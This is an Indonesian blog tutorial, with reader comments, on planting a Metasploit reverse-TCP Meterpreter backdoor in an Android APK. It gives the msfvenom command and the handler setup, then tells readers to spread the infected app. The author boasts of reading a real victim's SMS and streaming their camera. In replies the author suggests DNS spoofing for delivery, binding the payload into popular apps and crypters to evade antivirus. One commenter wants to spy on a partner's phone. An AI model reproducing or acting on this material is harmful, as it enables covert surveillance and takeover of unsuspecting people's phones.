» » » Exploit Android dengan Metasploit

Exploit Android dengan Metasploit

,
Exploit ini menggunakan metode dengan menyisipkan shell ke dalam apk (injeksi).
Buat temen temen harap hati hati kalau mau download dan install aplikasi, karena dengan di injeksi shell, si attacker dapat melakukan exploit/remote/dll kapan saja ketika android terhubung ke internet (meterpreter opened). Apalagi di android yang jarang di lakukan scan antivirus secara berkala.

 Exploit Android dengan Metasploit Kali Linux
Pertama tama kita buat terlebih dahulu backdoor beserta apknya
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.186 LPORT=4444 R > mymastahh.apk
192.168.43.186 adalah ip address komputer saya (listener), silahkan disesuaikan dengan ip address milik kalian.
mymastahh.apk merupakan nama aplikasi, silahkan diganti juga sesuai keinginan.

 File apk akan tersimpan di direktori Home

Mari kita jalankan metasploit
msfconsole
Lalu masukkan perintah berikut untuk memulai exploitnya
use exploit/multi/handler
set payload android/metepreter/reverse_tcp
set lhost 192.168.43.186
set lport 4444
exploit
Ganti 192.168.43.186 dengan ip address kalian, seperti saat membuat backdoor tadi

Sekarang sebarkan apk yang sudah kalian sisipkan backdoor
:)

Setelah sekian lama menunggu, akirnya ada korban yang sudah menginstall dan membuka aplikasi terinjeksi backdoor buatan saya :v
Status metepreter session sudah opened, saya sudah memiliki akses penuh terhadap android korban, wkwkwk:v

Info spesifikasi android korban

Log sms android korban
wkwkkwkw kasihan amat kuotanya sudah habis :v

Untuk melihat streaming dari kamera korban gunakan perintah
webcam_stream

Mouse nya nyala :v
Sticker gopro nya bagus juga yak :3

28 Obrolan Seru di Artikel "Exploit Android dengan Metasploit"

  1. dean wahyu17 October 2016 at 14:17

    wah keren gan. tolong ajarin donk ane sering gagal nih. cara ngirim backdoornya gimana yaa? lewat apa soalnya saya gagal waktu exploitnya. thanks ditunggu

    ReplyDelete
    Replies
    1. My Mastah17 October 2016 at 14:42

      kalau ane biasanya pake dns spoofing, jadi si target ane paksa biar mau download shell nya

      Delete
  2. reyhan tri adi putra1 May 2017 at 16:55

    kalau disisipkan ke line/ Ig gimana tuh?

    ReplyDelete
    Replies
    1. MyMastah1 May 2017 at 20:14

      Bisa :D. Karena di web ini belum ada tutorialnya, silahkan cari di google dulu ya XD. Keyword > How to binding payload meterpreter in to any apk, how to exploit payload meterpreter in to apk, how to embed payload meterpreter into Apk. Supaya lebih mudah coba nyimak video tutorial dari youtube

      Delete
  3. pajar kurniawan3 August 2017 at 23:10

    Ini beda jaringan atau satu jaringan gan ?

    ReplyDelete
  4. StudiO SuprenD11 August 2017 at 23:20

    kalau boleh tahu contoh aplikasinya mastah mana?

    ReplyDelete
  5. Irfan9 September 2017 at 14:28

    Wuih mantap mastah gilaa bener

    ReplyDelete
  6. Curup Dot Net14 September 2017 at 18:53

    bang klo waktu di install Parse Error "There was a problem parsing the package" itu kenapa ya?
    ane coba pake 2 HH satu OS 6.0.1 sama 7
    apa pengaruh versi android nya?
    biar support smua versi OS gimana?

    ReplyDelete
    Replies
    1. MyMastah16 September 2017 at 21:31

      itu gara gara security di system androidnya. Hp bagus susah ditembus kwkw
      Kalau pingin coba simulasi saja, coba cek menu Security di androidmu.
      Hilangin centang di ceklist App permission.
      Soalnya payload yg kita buat dari msf dari awal memang masih polosan, wajar aja udah kehadang sama system (padahal belum ada AV nya kwkw)

      Delete
    2. MyMastah16 September 2017 at 21:32

      Video buat matiin beberapa fitur security system android > https://www.youtube.com/watch?v=_oPsC4Q_94c

      Delete
    3. MyMastah16 September 2017 at 21:36

      Buat payload msf support semua versi Android bisa cari keyword di google > how create persistance back door android atau how create crypter fud for back door msf android
      Tanya bagaimana caranya? bakal panjang jelasinnya. Ilmunya luas banget, harus paham pemrograman juga

      Delete
  7. hacktivist19 October 2017 at 19:29

    hi my mastah.. ini kan 1 jaringan yak, kalau misal saya pasang di server VPS dengan jaringan vps trs saya buat payload di vps menggunakan IP public vps, dan kirim backdoor ke target, apa simulasi seperti itu bisa jadi beda jaringan?

    ReplyDelete
    Replies
    1. MyMastah20 October 2017 at 12:55

      Bisa banget mas :D
      Kalau pingin jalankan di pc sendiri bisa nyoba vpn (support port forwarding) atau Router yang ada fitur port forwardingnya

      Delete
  8. Anonymous21 October 2017 at 21:11

    Kalo access denid gimana gan?

    ReplyDelete
    Replies
    1. MyMastah29 May 2018 at 11:48

      untuk android kitkat keatas memang lebih secure :D

      Delete
  9. Rental Mobil Malang28 December 2017 at 16:40

    mantab nih, semoga bisa dicoba dan berhasil. thanks ya gan.

    ReplyDelete
  10. Borong Kerja Bangunan Malang26 January 2018 at 20:19

    Rumit tetapi ingin mencoba exploit android. Penasaran ingin hack hp pacar

    ReplyDelete
  11. HcK lst time7 April 2018 at 22:47

    gan kenapa suka pending di akhir pasmau masuk menitoringnya

    mohon saran

    ReplyDelete
    Replies
    1. MyMastah29 May 2018 at 11:50

      koneksi juga mempengaruhi, entah dari victim/target atau pc kita

      Delete
  12. HcK lst time7 April 2018 at 22:50

    kenapa
    engga gini gan
    msf exploit(handler) >

    tapi di saya malah gini
    msf exploit(multi/handler) >

    mohon saran

    ReplyDelete
  13. DIKI DEWANTO8 June 2018 at 03:23

    udah pernah coba di vps? pas bagian webcam_stream nya ga bisa tampil ni d browser nya.. gmn ngakalinnya ya? thx sblm nya..

    ReplyDelete
  14. Ganda Sembiring13 June 2018 at 00:06

    om mw nanya nih,pas pembuatan payload kenapa "invalid payload selected"?
    mohon responnya om :)

    ReplyDelete

Dilarang mencantumkan Link aktif di komentar ya :)
Berkomentarlah secara relevan sesuai konten
No SPAM, no SARA :)

Subscribe to: Post Comments (Atom)